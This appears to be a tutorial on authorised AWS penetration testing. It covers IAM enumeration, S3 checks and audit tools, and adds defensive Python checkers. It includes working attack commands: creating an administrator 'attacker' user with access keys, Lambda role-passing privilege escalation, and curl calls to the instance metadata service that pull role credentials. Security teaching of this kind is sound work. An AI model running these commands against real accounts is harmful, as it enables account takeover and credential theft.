Cloud infrastructure has become the primary attack surface for many organizations, and AWS is the dominant platform. Cloud penetration testing requires a different mindset than traditional network pentesting — instead of finding open ports, you’re hunting for overly permissive IAM policies, exposed S3 buckets, unauthenticated metadata endpoints, and misconfigurations that allow privilege escalation within the cloud control plane.
Legal Prerequisites
Before testing any AWS environment:
- Obtain written authorization from the AWS account owner
- Review AWS Penetration Testing Policy
- AWS permits testing of your own resources without prior approval for most services (EC2, RDS, CloudFront, API Gateway, Lambda, Lightsail, Elastic Beanstalk, and ECS/ECR)
- Prohibited: DDoS testing, DNS zone walking, port flooding
Essential tools for AWS pentesting:
# AWS CLI
pip3 install awscli --break-system-packages
aws configure # Enter access key, secret key, region
# ScoutSuite — multi-cloud security auditing
pip3 install scoutsuite --break-system-packages
# Pacu — AWS exploitation framework
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu && pip3 install -r requirements.txt --break-system-packages
# CloudFox — cloud security tooling
wget https://github.com/BishopFox/cloudfox/releases/latest/download/cloudfox-linux-amd64.zip
unzip cloudfox-linux-amd64.zip && mv cloudfox /usr/local/bin/
# enumerate-iam
git clone https://github.com/andresriancho/enumerate-iam.git
Phase 1: Initial Enumeration with Stolen/Provided Credentials
If you have access to an IAM access key pair (common in external tests where credentials are provided as a starting point):
# Configure credentials
aws configure
# Or export directly:
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_DEFAULT_REGION=us-east-1
# Who am I?
aws sts get-caller-identity
Output reveals the account ID, user ARN, and user ID — critical for planning next steps.
Enumerate IAM permissions:
# List attached policies
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-user-policies --user-name USERNAME
# Get policy details
aws iam get-policy-version --policy-arn arn:aws:iam::ACCOUNT:policy/PolicyName --version-id v1
# Use enumerate-iam for automated permission discovery
python3 enumerate-iam/enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY
Phase 2: S3 Bucket Enumeration
Exposed S3 buckets remain one of the most common AWS misconfigurations:
# List all buckets in the account
aws s3 ls
# Check bucket ACL and policy
aws s3api get-bucket-acl --bucket BUCKET_NAME
aws s3api get-bucket-policy --bucket BUCKET_NAME
# List bucket contents
aws s3 ls s3://BUCKET_NAME/
# Check for public access blocks
aws s3api get-public-access-block --bucket BUCKET_NAME
# Download suspicious files
aws s3 cp s3://BUCKET_NAME/config.txt .
External bucket discovery (from outside the account):
# Try accessing without credentials
aws s3 ls s3://BUCKET_NAME --no-sign-request
# Tools for bucket enumeration
gobuster s3 -w wordlist.txt
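As an added example (not code from the original post), the following Python turns the output of the two `s3api` calls above into a verdict: it parses a constructed `get-bucket-policy` response for Allow statements open to an anonymous principal and then checks whether `RestrictPublicBuckets` in the constructed `get-public-access-block` response neutralises them. Bucket name, account ID and policy contents are made up.

```python
import json

# Constructed samples (not from a real account) in the shape of the responses
# from `aws s3api get-bucket-policy` (Policy is a JSON string) and
# `aws s3api get-public-access-block`.
POLICY_RESPONSE = {"Policy": json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "OwnerAdmin", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::example-bucket/*"},
]})}
PAB_RESPONSE = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": False, "IgnorePublicAcls": False,
    "BlockPublicPolicy": False, "RestrictPublicBuckets": False}}

READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}
WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:*", "*"}

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _is_anonymous(principal):
    # Principal "*" or {"AWS": "*"} means any caller, signed or not.
    return principal == "*" or (isinstance(principal, dict)
                                and "*" in _as_list(principal.get("AWS", [])))

def public_statements(policy_response):
    """(Sid, lower-cased actions) for each unconditional Allow open to everyone.
    Statements with a Condition are skipped: they may restrict access (e.g. by
    source IP) and need manual review."""
    doc = json.loads(policy_response["Policy"])
    return [(st.get("Sid", "<no sid>"), [a.lower() for a in _as_list(st.get("Action", []))])
            for st in _as_list(doc.get("Statement", []))
            if st.get("Effect") == "Allow" and "Condition" not in st
            and _is_anonymous(st.get("Principal"))]

def assess_bucket(policy_response, pab_response):
    """Public policy statements only take effect while RestrictPublicBuckets is off."""
    stmts = public_statements(policy_response)
    cfg = pab_response["PublicAccessBlockConfiguration"]
    actions = set() if cfg.get("RestrictPublicBuckets") else {a for _, acts in stmts for a in acts}
    return {"public_read": bool(actions & READ_ACTIONS),
            "public_write": bool(actions & WRITE_ACTIONS),
            "statements": [sid for sid, _ in stmts]}
```

Bucket ACLs (the `get-bucket-acl` output) are a separate public-access path and are not evaluated here.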
Phase 3: IAM Privilege Escalation
AWS IAM privilege escalation is analogous to local privesc — find a permission that lets you obtain higher privileges. Common vectors:
Creating a New User or Policy
If you have iam:CreateUser + iam:AttachUserPolicy + iam:CreateAccessKey:
aws iam create-user --user-name attacker
aws iam attach-user-policy --user-name attacker --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name attacker
Lambda Execution Privesc
If you can create Lambda functions and pass an existing role:
aws lambda create-function --function-name privesc --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/LambdaAdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name privesc output.txt
Using Pacu for Automated Privesc Discovery
cd pacu && python3 pacu.py
Pacu > import_keys --all
Pacu > run iam__enum_users_roles_policies_groups
Pacu > run iam__privesc_scan
Pacu’s iam__privesc_scan identifies all possible escalation paths based on current permissions.
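As an added example (not Pacu's code and not from the original post), here is a small audit routine for the two permission combinations described above plus the `*:*` administrator case: it reads a constructed IAM policy document, applies IAM's rule that an explicit Deny overrides Allow, expands `service:*` wildcards, and reports which escalation paths a policy fully grants. It assumes every statement applies to `Resource: "*"` (resource scoping is ignored) and handles `Action` only, not `NotAction`.

```python
import fnmatch

# Constructed sample policy document (the PolicyDocument field returned by
# `aws iam get-user-policy` / `get-policy-version`); not from a real account.
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Resource": "*",
     "Action": ["iam:CreateUser", "iam:AttachUserPolicy", "iam:CreateAccessKey",
                "iam:PassRole", "lambda:*"]},
    {"Effect": "Deny", "Resource": "*", "Action": "iam:CreateAccessKey"},
]}

# Permission sets behind the two escalation paths described above. Every action
# in a set must be allowed (and not denied) for the path to be reported.
PRIVESC_PATHS = {
    "create-admin-user": ("iam:CreateUser", "iam:AttachUserPolicy", "iam:CreateAccessKey"),
    "lambda-passrole": ("lambda:CreateFunction", "iam:PassRole", "lambda:InvokeFunction"),
}

def _as_list(v):
    return v if isinstance(v, list) else [v]

def _matches(patterns, action):
    # IAM action names are case-insensitive and may contain '*' wildcards (lambda:*).
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def allowed_actions(doc, candidates):
    """Candidate actions the document effectively allows. Resource scoping is
    ignored (assumed '*'), and an explicit Deny beats any Allow, as in IAM."""
    allow, deny = [], []
    for st in _as_list(doc.get("Statement", [])):
        bucket = allow if st.get("Effect") == "Allow" else deny
        bucket.extend(_as_list(st.get("Action", [])))
    return {a for a in candidates if _matches(allow, a) and not _matches(deny, a)}

def is_admin(doc):
    """True when some Allow statement grants Action '*' on Resource '*'."""
    return any(st.get("Effect") == "Allow"
               and "*" in _as_list(st.get("Action", []))
               and "*" in _as_list(st.get("Resource", []))
               for st in _as_list(doc.get("Statement", [])))

def privesc_paths(doc):
    """Names of the escalation paths whose full permission set is granted."""
    needed = {a for acts in PRIVESC_PATHS.values() for a in acts}
    granted = allowed_actions(doc, needed)
    return sorted(name for name, acts in PRIVESC_PATHS.items() if set(acts) <= granted)
```

In the sample, the Deny on `iam:CreateAccessKey` blocks the create-user path, while `lambda:*` plus `iam:PassRole` still satisfies the Lambda path.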
If you have access to an EC2 instance (via SSRF or shell access), the instance metadata service (IMDS) exposes the temporary credentials of the IAM role attached to that instance:
# IMDSv1 (deprecated but still common)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
Extracted credentials (AccessKeyId, SecretAccessKey, Token) can be used immediately with AWS CLI.
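Whether the exposure above is possible depends on each instance's metadata options. As an added example (not from the original post), this Python reads a constructed `aws ec2 describe-instances` response and flags instances whose IMDS endpoint is enabled but does not require IMDSv2 tokens, or whose PUT hop limit would let a container behind one network hop fetch a token. Instance IDs and the instance-profile ARN are made up.

```python
# Constructed sample in the shape of `aws ec2 describe-instances` output,
# reduced to the fields this check needs. Instance IDs and ARN are made up.
SAMPLE_DESCRIBE = {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa0000example01",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/WebRole"},
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0aaa0000example02",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/WebRole"},
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0aaa0000example03",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]}

def imds_findings(describe_output):
    """Return {instance_id: [finding, ...]} for instances whose metadata
    service could hand role credentials to an SSRF or a compromised container."""
    findings = {}
    for reservation in describe_output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") != "enabled":
                continue  # IMDS switched off: 169.254.169.254 is unreachable
            issues = []
            # HttpTokens "optional" means plain GETs (IMDSv1) still work.
            if opts.get("HttpTokens") != "required":
                role = " with role attached" if "IamInstanceProfile" in inst else ""
                issues.append("IMDSv1 allowed" + role)
            # A hop limit above 1 lets the token PUT cross one network hop,
            # e.g. from a container on a bridge network.
            hops = opts.get("HttpPutResponseHopLimit", 1)
            if hops > 1:
                issues.append("hop limit %d" % hops)
            if issues:
                findings[inst["InstanceId"]] = issues
    return findings
```

Pair this with the `RestrictPublicBuckets`-style remediation for IMDS: `aws ec2 modify-instance-metadata-options --http-tokens required` enforces IMDSv2 on an existing instance.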
ScoutSuite: Automated Cloud Audit
ScoutSuite runs a comprehensive audit across all AWS services:
scout aws --no-browser
# Output: scoutsuite-report/
Open the HTML report to see all findings categorized by severity across IAM, S3, EC2, RDS, Lambda, and more.
CloudFox: Finding Attack Paths
CloudFox finds attack paths in a given AWS account:
cloudfox aws -p PROFILE_NAME all-checks
cloudfox aws -p PROFILE_NAME buckets
cloudfox aws -p PROFILE_NAME iam-simulator
Key Findings to Document
In a cloud pentest report, prioritize:
- Publicly readable/writable S3 buckets containing sensitive data
- IAM users/roles with *:* permissions (AdministratorAccess)
- Exposed EC2 metadata without IMDSv2 enforcement
- Unauthenticated Lambda or API Gateway endpoints
- Secrets in Lambda environment variables or EC2 user data
- RDS databases publicly accessible
Cloud pentesting certifications worth pursuing: AWS Certified Security Specialty, Certified Cloud Pentesting Professional (CCP), and Hacking the Cloud course by Nick Frichette.